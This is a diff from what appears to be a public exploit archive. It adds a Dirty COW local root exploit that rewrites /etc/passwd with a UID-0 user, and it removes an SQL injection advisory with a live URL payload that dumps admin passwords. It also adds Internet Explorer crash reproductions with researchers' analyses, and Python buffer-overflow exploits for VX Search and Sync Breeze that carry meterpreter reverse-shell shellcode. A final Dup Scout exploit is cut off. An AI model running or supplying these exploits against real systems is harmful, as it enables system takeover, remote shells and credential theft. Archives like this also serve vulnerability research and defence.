0) ;// zero
printf("mmap %lx\n\n",(unsigned long)map);// sum of error code
pid=fork() ;// fork process
if(pid) {// if parent
waitpid(pid,NULL,0) ;// wait for child
int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)
for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l
for(o=0;o<l;o++)//////////////////////// repeat for each byte
for(u=0;u<10000;u++)////////////////// try 10K times each time
c+=ptrace(PTRACE_POKETEXT ,// inject into memory
pid ,// process id
map+o ,// address
*((long*)(argv[2]+o))) ;// value
printf("ptrace %d\n\n",c) ;// sum of error code
}// otherwise
else {// child
pthread_create(&pth ,// create new thread
NULL ,// null
madviseThread ,// run madviseThred
NULL) ;// null
ptrace(PTRACE_TRACEME) ;// stat ptrace on child
kill(getpid(),SIGSTOP) ;// signal parent
pthread_join(pth,NULL) ;// wait for thread
}// / child
return 0 ;// return
}// / entrypoint
//////////////////////////////////////////////

181
platforms/linux/local/40839.c Executable file
View file

@ -0,0 +1,181 @@
//
// This exploit uses the pokemon exploit as a base and automatically
// generates a new passwd line. The original /etc/passwd is then
// backed up to /tmp/passwd.bak and overwritten with the new line.
// The user will be prompted for the new password when the binary is run.
// After running the exploit you should be able to login with the newly
// created user.
//
// Original exploit:
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// To use this exploit modify the user values according to your needs
//
// Compile with
//
// gcc -pthread dirty.c -o dirty -lcrypt
//
// and just run the newly create binary with ./dirty
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw = getpass("Please enter new password: ");
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created\n", filename);
printf("You can log in with username %s and password %s.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
filename, backup_filename);
return 0;
}

44
platforms/php/webapps/6927.txt
View file

@ -1,44 +0,0 @@
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## AJ ARTICLE ( featured_article.php mode )
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f
##
## Email : SQL@Hotmail.it
##
## SYRiAN Arab HACkErS
########################
########################
##
## Name : AJ ARTICLE
##
## Site : www.ajsquare.com
##
########################
########################
##
## -(:: L!VE DEMO ::)-
##
## http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin--
##
########################
########################
#######################################################################################################
#######################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################
# milw0rm.com [2008-11-01]

69
platforms/windows/dos/40841.html Executable file
View file

@ -0,0 +1,69 @@
<!--
Source: http://blog.skylined.nl/20161122001.html
Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. The issue does not appear to be easily exploitable.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<style>
position_­fixed { position: fixed; }
position_­relative { position: relative; }
float_­left { float: left; }
complex { float: left; width: 100%; }
complex:first-line { clear: left; }
</style>
<script>
window.onload = function boom() {
o­Element_­float_­left = document.create­Element('float_­left');
o­Element_­complex = document.create­Element('complex');
o­Element_­position_­fixed = document.create­Element('position_­fixed');
o­Element_­position_­relative = document.create­Element('position_­relative');
o­Element_­table = document.create­Element('table');
o­Element_­x = document.create­Element('x');
o­Text­Node = document.create­Text­Node('x');
document.document­Element.append­Child(o­Element_­float_­left);
o­Element_­float_­left.append­Child(o­Element_­complex);
o­Element_­float_­left.append­Child(o­Text­Node);
o­Element_­complex.append­Child(o­Element_­position_­fixed);
o­Element_­complex.append­Child(o­Element_­position_­relative);
o­Element_­complex.append­Child(o­Element_­table);
o­Element_­complex.append­Child(o­Element_­x);
set­Timeout(function() {
o­Element_­x.set­Attribute('class', 'x');
set­Timeout(function() {
alert();
document.write(0);
}, 0);
}, 0);
}
</script>
</head>
</html>
<!--
Description
The issue requires rather complex manipulation of the DOM and results in reading a value immediately following an object. The lower three bits of this value are returned by the function doing the reading, resulting in a return value in the range 0-7. After exhaustively skipping over the read AV and having that function return each value, no other side effects were noticed. For that reason I assume this issue is hard if not impossible to exploit and did not investigate further. It is still possible that there may be subtle effects that I did not notice that allow exploitation in some form or other.
Time-line
June 2014: This vulnerability was found through fuzzing.
October 2014: This vulnerability was submitted to ZDI.
October 2014: This vulnerability was rejected by ZDI.
November 2014: This vulnerability was reported to MSRC.
February 2015: This vulnerability was addressed by Microsoft in MS15-009.
November 2016: Details of this issue are released.
-->

175
platforms/windows/dos/40843.html Executable file
View file

@ -0,0 +1,175 @@
<!--
Source: http://blog.skylined.nl/20161124001.html
Synopsis
A specially crafted web-page can cause a type confusion in HTML layout in Microsoft Internet Explorer 11. An attacker might be able to exploit this issue to execute arbitrary code.
Known affected software and attack vectors
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<script>
window.onload = function () {
document.get­Elements­By­Tag­Name("iframe")[0].src = "repro-iframe.html";
}
</script>
</head>
<body>
<iframe></iframe>
</body>
</html>
<!--
Repro-iframe.html:
<svg><path marker-start="url(#)"><title><q><button>
Description
Internally MSIE uses various lists of linked CTree­Pos objects to represent the DOM tree. For HTML/SVG elements a CTree­Node element is created, which embeds two CTree­Pos instances: one that contains information about the first child of the element and one that indicates the next sibling or parent of the element. For text nodes an object containing only one CTree­Pos is created, as such nodes never have any children. CTree­Pos instances have various flags set. This includes a flag that indicates if they are the first (f­TPBegin) or second (f­TPEnd) CTree­Pos instance for an element, or the only instance for a test node (f­TPText).
The CTree­Pos::Branch method of an CTree­Pos instance embedded in a CTree­Node can be used to calculate a pointer to the CTree­Node. It determines if the CTree­Pos instance is the first or second in the CTree­Node by looking at the f­TPBegin flag and subtract the offset of this CTree­Pos object in a CTree­Node object to calculate the address of the later. This method assumes that the CTree­Pos instance is part of a CTree­Node and not a Text­Node. It will yield invalid results when called on the later. In a Text­Node, the CTree­Pos does not have the f­TPBegin flag set, so the code assumes this is the second CTree­Pos instance in a CTree­Node object and subtracts 0x24 from its address to calculate the address of the CTree­Node. Since the CTree­Pos instance is the first element in a Text­Node, the returned address will be 0x24 bytes before the Text­Node, pointing to memory that is not part of the object.
Note that this behavior is very similar to another issue I found around the same time, in that that issues also caused the code to access memory 0x24 bytes before the start of a memory region containing an object. Looking back I believe that both issues may have had the same root cause and were fixed at the same time.
The CGenerated­Content::Has­Generated­SVGMarker method walks the DOM using one of the CTree­Pos linked lists. It looks for any descendant node of an element that has a CTree­Pos instance with a specific flag set. If found, the CTree­Pos::Branch method is called to find the related CTree­Node, without checking if the CTree­Pos is indeed part of a CTree­Node. If a certain flag is set on this CTree­Node, it returns true. Otherwise it continues scanning. If nothing is found, it returns false.
The repro creates a situation where the CGenerated­Content::Has­Generated­SVGMarker method is called on an SVG path element which has a Text­Node instance as a descendant with the right flags set to cause it to call CTree­Pos::Branch on this Text­Node. This leads to type confusion/a bad cast where a pointer that points before a Text­Node is used as a pointer to a CTree­Node.
Reversed code
While reversing the relevant parts, I created the following pseudo-code to illustrate the issue:
enum e­Tree­Pos­Flags {
f­TPBegin = 0x01, // if set, this is a markup node
f­TPEnd = 0x02, // if set, this is a markup node
f­TPText = 0x04, // if set, this is a markup node
f­TPPointer = 0x08, // if set, this is not a markup node
f­TPType­Mask = 0x0f
f­TPLeft­Child = 0x10,
f­TPLast­Child = 0x20, // po­Next­Sibling­Or­Parent => f­TPLast­Child ? parent : sibling
f­TPData2Pos = 0x40, // valid if f­TPPointer is set
f­TPData­Pos = 0x80,
f­TPUnknown­Flag100 = 0x100, // if set, this is not a markup node
}
struct CTree­Pos {
/*offs size*/ // THE BELOW ARE BEST GUESSES BASED ON INADEQUATE INFORMATION!!
/*0000 0004*/ e­Tree­Pos­Type f­Flags00;
/*0004 0004*/ UINT u­Chars­Count04; // Seems to be counting some chars - not sure what exactly
/*0008 0004*/ CTree­Pos* po­First­Child; // can be NULL if no children exist.
/*000C 0004*/ CTree­Pos* po­Next­Sibling­Or­Parent; // f­Flags00 & f­TPLast­Child ? parent end tag : sibling start tag
/*0010 0004*/ CTree­Pos* po­Thread­Left10; // f­Flags00 & f­TPBegin ? previous sibling or parent : last child or start tag
/*0014 0004*/ CTree­Pos* po­Thread­Right14; // f­Flags00 & f­TPBegin ? first child or end tag :
/*0018 0004*/ flags (0x10 = something with CDATA
/*0028 0004*/
}
struct CTree­Node {
/*offs size*/ // THE BELOW ARE BEST GUESSES BASED ON INADEQUATE INFORMATION!!
/*0000 0004*/ CElement* po­Element00;
/*0004 0004*/ CTree­Node* po­Parent04;
/*0008 0004*/ DWORD dw­Unknown08; // flags?
/*000C 0018*/ CTree­Pos o­Tree­Pos­Begin0C; // represents the position in the document immediately before the start tag
/*0024 0018*/ CTree­Pos o­Tree­Pos­End24; // represents the position in the document immediately after the end tag
/*003C ????*/ Unknown
}
struct Text­Node { // I did not figure out what this is called in MSIE
/*0000 0018*/ CTree­Pos o­Tree­Pos­End00; // represents the position in the document immediately after the node.
/*0018 0014*/ Unknown
}
CTree­Node* CTree­Pos::Branch() {
// Given a pointer to a CTree­Pos instance in a CTree­Node instance, calculate a pointer to the CTree­Node instance.
// The CTree­Pos instance must be either the o­Tree­Pos­Begin0C (o­Tree­Pos­Begin0C->f­Flags00 & f­TPBegin != 0) or the
// o­Tree­Pos­End24 (o­Tree­Pos­End24->f­Flags00 & f­TPEnd != 0).
BOOL b­Is­Tree­Pos­Begin0C = this->f­Flags00 & f­TPBegin;
INT u­Offset = offsetof(CTree­Node, b­Is­Tree­Pos­Begin0C ? o­Tree­Pos­Begin0C : o­Tree­Pos­End24);
return (CTree­Node*)((BYTE*)this - u­Offset);
}
BOOL CGenerated­Content::Has­Generated­SVGMarker() {
for (
CTree­Pos* po­Current­Tree­Pos = this->o­Tree­Pos­Begin0C.po­Thread­Right14,
CTree­Pos* po­End­Tree­Pos = &(this->o­Tree­Pos­End24);
po­Current­Tree­Pos != po­End­Tree­Pos;
po­Current­Tree­Pos = po­Current­Tree­Pos->po­Thread­Right14
) {
if (po­Current­Tree­Pos->f­Flags00 & f­TPUnknown­Flag100) {
// Calling Branch is only valid in the context of CTree­Pos embedded in a CTree­Node, so the code should check for
// the presence of f­TPBegin or f­TPEnd in f­Flags00 before doing so. This line of code may fix the issue:
// if (po­Current­Tree­Pos->f­Flags00 & (f­TPBegin | f­TPEnd) == 0) continue;
CTree­Node* po­Tree­Node = po­Current­Tree­Pos->Branch();
if (po­Tree­Node && po­Tree­Node->dw64 == 20) {
return 1
}
}
}
return 0
}
DOM Tree
If you replace the <q> tag with an <a> tag in the repro, or insert a <script> tag before the <svg> tag, the repro does not trigger an access violation. At that point it is possible to use document.document­Element.outer­HTML as well as recursively walk document.document­Element.child­Nodes to get an idea of what the DOM tree looks like around the time of the crash.
document.document­Element.outer­HTML:
<html>
<head>
</head>
<body>
<svg xmlns="http://www.w3.org/2000/svg">
<path marker-start="url("#")">
<title>
<q>
<button> // no closing tag.
<script> // script is a sibling of button
#text // snipped
</script>
</q>
</title> // Things get really weird here:
</title>
</path> // all svg close tags are doubled!?
</path>
</svg> // Not sure what this means.
</svg>
</body>
</html>
Walking document.document­Element.child­Nodes:
<html>
<head>
<body>
<svg> // I did not look at attributes
<path> // ^^^ same here
<title>
<q>
<button>
<script> // script is a child of button
#text // snipped
Exploit
I did not find any code path that could lead to exploitation. However, I did not do a thorough step through of the code to find out if and how I might control execution flow upwards in the stack. Also, it appears trivial to have MSIE survive the initial crash by massaging the heap. It might be possible that other methods are affected by a similar issue and that further DOM manipulations can be used to trigger a more interesting code path.
Time-line
July 2014: This vulnerability was found through fuzzing.
September 2014: This vulnerability was submitted to ZDI.
September 2014: This vulnerability appears to have been fixed.
October 2014: This vulnerability was rejected by ZDI.
November 2016: Details of this issue are released.
-->

55
platforms/windows/dos/40844.html Executable file
View file

@ -0,0 +1,55 @@
<!--
Source: http://blog.skylined.nl/20161125001.html
Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer 10 to continue to use an object after freeing the memory used to store the object. An attacker might be able to exploit this issue to execute arbitrary code.
Known affected software and attack vectors
Microsoft Internet Explorer 10
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<!DOCTYPE html>
<html>
<head>
<script>
var o­Window = window.open("window.xhtml");
set­Interval(function () {
try {
o­Window.eval("(" + function () {
document.design­Mode = "on";
document.exec­Command("Select­All");
var o­Selection = window.get­Selection();
o­Selection.collapse(document,1);
document.exec­Command("Insert­Image", false);
document.design­Mode="off";
} + ")()");
} catch (e) {}
}, 1);
</script>
</head>
</html>
Window.xhtml
<!-- comment --><html xmlns="http://www.w3.org/1999/xhtml">
</html>
<!--
Description
The last line of script (design­Mode = "off") will cause some cleanup in MSIE, which appears to trigger use of a stale pointer in CEdit­Adorner::Detach. I did not investigate further.
Time-line
November 2012: This vulnerability was found through fuzzing.
November 2012: This vulnerability was submitted to EIP.
December 2012: This vulnerability was rejected by EIP.
January 2013: This vulnerability was submitted to ZDI.
March 2013: This vulnerability was acquired by ZDI.
June 2013: This issue was addressed by Microsoft in MS13-047.
November 2016: Details of this issue are released.
-->

65
platforms/windows/dos/40845.txt Executable file
View file

@ -0,0 +1,65 @@
Source: http://blog.skylined.nl/20161128001.html
Synopsis
A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does not expect, or have code attempt to execute a method of an object using a vftable, when that object does not have a vftable. Successful exploitation can lead to arbitrary code execution.
Known affected software and attack vectors
Microsoft Internet Explorer 8, 9, 10 and 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
1 Repro.svg:
<script xmlns="http://www.w3.org/2000/svg">
window.exploit = function(w) {
o={x:w.DOMImplementation(0).prototype.has­Feature};
o.x();
};
open("1 Target.html");
</script>
1 Target.html:
<script>
opener.exploit(window);
</script>
Description
In an SVG page, a copy of the has­Feature method of a DOMImplementation object from a HTML page is created. This copy is used as a method of a new object and called with one argument. This can cause at least two issues in the MSHTML!Method_­VARIANTBOOLp_­BSTR_­o0o­VARIANT function of MSIE:
A Failfast exception when the code detects that calling a method of an object has not cleaned up the stack as expected; this is because the called function appears to expect a different number of arguments or a different calling convention. This issue can be triggered by changing the line o.x(); in the repro to o.x(new Array).
An out-of-bounds write when MSHTML!CBase::Private­Get­Disp­ID is called; this is probably caused by a type confusion bug: the code expects a VARIANT object of one type, but is working on an object of a different type.
The repro was tested on x86 systems and does not reproduce this issue on x64 systems. I did not determine if this is because x64 systems are not affected, or because the repro needs to be modified to work on x64 systems.
Exploit
Exploitation was not attempted. I reversed Method_­VARIANTBOOLp_­BSTR_­o0o­VARIANT only sufficiently to get an idea of the root cause, but not enough to determine exactly what is going on or how to control the issue for command execution.
2 Repro.html:
<body onload=open("2 Target.html")>
2 Target.html:
<meta http-equiv=X-UA-Compatible content=IE=11><body onload=x=opener.DOMImplementation(0).prototype.is­Prototype­Of;x()>
Description
Calling the is­Prototype­Of method of the DOMImplementation interface as a function results in type confusion where an object is assumed to implement IUnknown when in fact it does not. The code attempts to call the Release method of IUnknown through the vftable at offset 0, but since the object has no vftables, a member property is stored at this offset, which appears to have a static value 002dc6c0. An attacker that is able to control this value, or allocate memory and store data at that address, may be able to execute arbitrary code.
Exploit
No attempts were made to further reverse the code and determine the exact root cause. A few attempts were made to control the value at offset 0 of the object in question, as well as get another object in its place with a different value at this location, but both efforts were brief and unsuccessful.
Time-line
September 2015: This vulnerability was found through fuzzing.
October 2015: This vulnerability was submitted to ZDI.
November 2015: This vulnerability was acquired by ZDI.
February 2016: This issue was addressed by Microsoft in MS16-009.
November 2016: Details of this issue are released.

100
platforms/windows/remote/40830.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/python
print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 10015BBE
nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

100
platforms/windows/remote/40831.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/python
print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1001A1B8
nseh = "\x90\x90\xEB\x0B"
seh = "\xB8\xA1\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

100
platforms/windows/remote/40832.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/python
print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
